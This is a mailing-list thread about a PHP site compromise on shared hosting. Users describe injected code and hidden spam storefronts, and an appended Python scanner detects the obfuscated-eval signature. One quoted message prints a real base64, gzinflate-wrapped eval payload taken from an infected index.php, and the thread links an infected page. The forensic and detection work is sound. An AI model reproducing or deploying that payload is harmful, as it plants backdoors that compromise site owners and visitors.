Thanks, Owen - I've got a clue as to what happened. I found the exact
same symptom in my WordPress 3.2.1 blog, different subdomain, same
host. (my.dlma.com)

Recipe: Once in, a PHP script looks for "require_once" in other PHP
files (probably preferring index.php), wraps it with its eval()
statement and a payload that includes a script with a backdoor (a copy
of itself, I guess), and chooses a deep random directory to set up a
storefront.  (Otherwise, why did it put one inside my password-
protected /music/ subdirectory? No one could get there. This wasn't
done by a human who bothered to navigate to the storefront.)

Agree that Habari probably had nothing to do with it - although my
Habari installation got infected, it probably wasn't because of a
vulnerability within Habari.  This could be an old WordPress
vulnerability.  (If it's possible that PHP can walk the directory
structure from my "home" directory, that'd suck.)

Here's an example storefront hidden within a WordPress subdirectory
(practically the exact same infection):
http://www.iydu.org/wp-content/themes/desk-mess/them/1_6/coach-signature-strip-shoulder-bag-pink.html.

--David

On Oct 10, 12:40 pm, Owen Winkler <[email protected]> wrote:
> I'm reading your posts; thanks for that. I have not had time to
> investigate anything yet, though. Still, I suspect this may have more
> to do with being on shared hosting and/or having other software
> installed than being a Habari issue. Even known vulnerabilities in old
> versions of Habari wouldn't have allowed this without you noticing it
> happening via different symptoms. I suppose it's possible that Habari
> allowed this, but to me it seems more likely that Habari was infected
> by some other running script, maybe not installed by you or even in
> another shared hosting user's account, by virtue of it having files
> with PHP extensions.
>
> I'll see if I can turn up anything else useful from what you've
> provided so far.
>
> Owen
>
> > On Oct 9, 10:02 pm, David <[email protected]> wrote:
> >> Also, in my system/index.php, the following appears...
>
> >> // We start up output buffering in order to take advantage of output
> >> compression,
> >> // as well as the ability to dynamically change HTTP headers after
> >> output has started.
> >> ob_start();
> >> eval (gzinflate(base64_decode(
> >> 'RY6xDoIwFEV3Ev6hG7L0qS1oorEumpj4D82DPqQJpdhSvl8cjNM9yzm56nJWeXYN'
> >> .'9E420KaA3jsC0wzpO7hYw83gkLfegUvRtjA7FBD9+IogaYlHEoShqkl0dYOyrQ77'
> >> .'nZFbQXzqp4KVpzz7xZmxYUS3gtb3x/OmNSsZZwVgmv3g0fwVtd76AA==')));
> >> spl_autoload_register( 'habari_autoload' );
>

-- 
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to 
[email protected]
For more options, visit this group at 
http://groups.google.com/group/habari-users
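The "recipe" described above (an injected eval(gzinflate(base64_decode(...))) block dropped next to existing statements in index.php files, including in deep or password-protected subdirectories) is exactly the kind of thing a site owner can sweep for. The scanner below is an added example for this thread, not code from Habari, WordPress or anyone on the list. It walks a directory tree, flags every .php file containing that obfuscated-eval signature, and reports the line number so the file can be inspected and restored from a clean copy. The sample files it writes into a temporary directory are constructed here; the base64 text in the "infected" sample is a placeholder, not the payload quoted in the thread.

```python
import os
import re
import tempfile

# Signature of the injection described in the thread: eval() wrapping
# gzinflate(base64_decode(...)). Whitespace between the tokens is tolerated,
# since the quoted sample has a space after "eval".
OBFUSCATED_EVAL = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.IGNORECASE
)


def scan_php_source(source):
    """Return the 1-based line numbers where the obfuscated-eval pattern starts.

    The whole file is searched rather than line by line, so a statement that
    wraps across several lines (as in the quoted index.php) is still found.
    """
    return [source.count("\n", 0, m.start()) + 1 for m in OBFUSCATED_EVAL.finditer(source)]


def scan_tree(root):
    """Walk root and return {relative_path: [line_numbers]} for hits in .php files."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skip, keep scanning
            if hits:
                results[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return results


def build_sample_tree(root):
    """Write a constructed clean index.php and a constructed infected one deep in the tree."""
    deep = os.path.join(root, "deep", "dir")
    os.makedirs(deep, exist_ok=True)
    clean = "<?php\nob_start();\nrequire_once 'config.php';\n"
    # Constructed sample: same shape as the quoted snippet, placeholder payload.
    infected = (
        "<?php\n"
        "ob_start();\n"
        "eval (gzinflate(base64_decode(\n"
        "'PLACEHOLDER_BASE64_NOT_A_REAL_PAYLOAD'\n"
        ".'MORE_PLACEHOLDER_TEXT')));\n"
        "require_once 'config.php';\n"
    )
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write(clean)
    with open(os.path.join(deep, "index.php"), "w", encoding="utf-8") as fh:
        fh.write(infected)


def demo():
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    root = tempfile.mkdtemp(prefix="phpscan_")
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for path, lines in demo().items():
        print(f"{path}: obfuscated eval at line(s) {lines}")
```

To run it against a real site, replace the call to demo() with scan_tree("/path/to/docroot"); on a shared host, also scan every other PHP-hosting directory under the same account, since the thread's point is that the infection crossed application boundaries rather than coming through one application. Any hit is a reason to restore the file from a known-good copy and rotate credentials, not to simply delete the offending line.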
